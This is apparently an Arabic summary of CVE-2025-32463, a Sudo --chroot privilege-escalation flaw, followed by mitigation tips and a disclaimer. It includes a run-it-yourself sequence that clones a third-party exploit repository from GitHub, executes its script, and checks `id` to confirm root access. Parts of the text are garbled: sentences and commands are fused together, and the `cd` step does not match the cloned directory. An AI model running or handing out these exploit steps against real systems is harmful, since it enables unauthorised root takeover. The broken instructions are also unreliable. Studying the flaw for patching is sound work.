
CVE-2025-32463
إليك ملخص لـ CVE-2025-32463 بدون روابط:
CVE-2025-32463 هي ثغرة تصعيد امتيازات محلية في Sudo الإصدارات 1.9.14 حتى 1.9.17. تستغل خيار --chroot (-R) عن طريق التلاعب بطريقة تعامل Sudo مع nsswitch.conf. يتيح ذلك لمهاجم محلي خداع Sudo لتحميل مكتبة مشتركة ضارة، والحصول على صلاحيات الجذر، حتى لو لم يكن المستخدم مدرجًا في ملف sudoers.
sudo git clone https://github.com/B1ack4ash/Blackash-CVE-2025-32463.git
cd CVE-2025-32463
chmod +x CVE-2025-32463.sh
id
./CVE-2025-32463.sh
id
sudo -R /fake-dir some-command./fake-dir، يضع ملف etc/nsswitch.conf مزيفًا يجبر Sudo على حل أسماء المستخدمين أو المجموعات عبر طريقة مخصصة.sudo --version--chroot إلا عند الضرورةحتى لو لم يكن لدى المستخدم صلاحيات sudo، يمكنه أن يصبح جذرًا محتملاً عن طريق استغلال هذا الخلل. إنها مشكلة حرجة تؤثر على العديد من الأنظمة، ويجب تصحيحها فورًا.
تم توفير هذا الدليل الإثباتي (PoC) لأغراض تعليمية وبحثية فقط. تشغيله على أي نظام دون إذن هو غير قانوني وغير أخلاقي !!!